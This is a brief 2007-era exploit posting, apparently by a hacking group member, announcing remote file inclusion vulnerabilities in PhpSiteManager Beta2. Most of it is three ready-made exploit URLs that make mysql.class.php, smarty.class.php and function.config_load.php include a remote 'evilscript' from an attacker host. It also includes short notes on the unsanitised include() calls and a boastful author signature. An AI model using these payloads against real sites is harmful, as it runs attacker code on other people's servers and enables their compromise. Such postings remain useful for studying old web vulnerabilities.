PhpSiteManager-Beta2 Remote File Inclusion Vulnerability
Version Released    2007-05-01
------------------|
Timeline:10:11:07 |
------------------|
Download : 
--------------------------------------------------------------------------------------------------------|
http://downloads.sourceforge.net/phpsitemanager/phpSiteManager-Beta2.zip?modtime=1178024627&big_mirror=0|
--------------------------------------------------------------------------------------------------------|
--------|
Exploit |
--------|
----------------------------------------------------------------------------*              
/mysql.class.php?filename=http://host.com[evilscript.txt?]                  *
                                                                            *
/smarty.class.php?smarty_compile_path=http://host.com/evilscript?           *
                                                                            *
/function.config_load.php?compile_file=http://host.com/evilscript?          * 
----------------------------------------------------------------------------*
bug:
---
mysql.class.php include($filename)
$filename = $server_root . 'cache/sql_' . $hash . '.php';
bug
---
Smarty.class.php include($_smarty_compile_path)
bug:
---
function.config_load.php include($_compile_file)
-------|
Author |
-------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy@[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member .."we're not the only one's but we're the best"
---|
EOF|
---|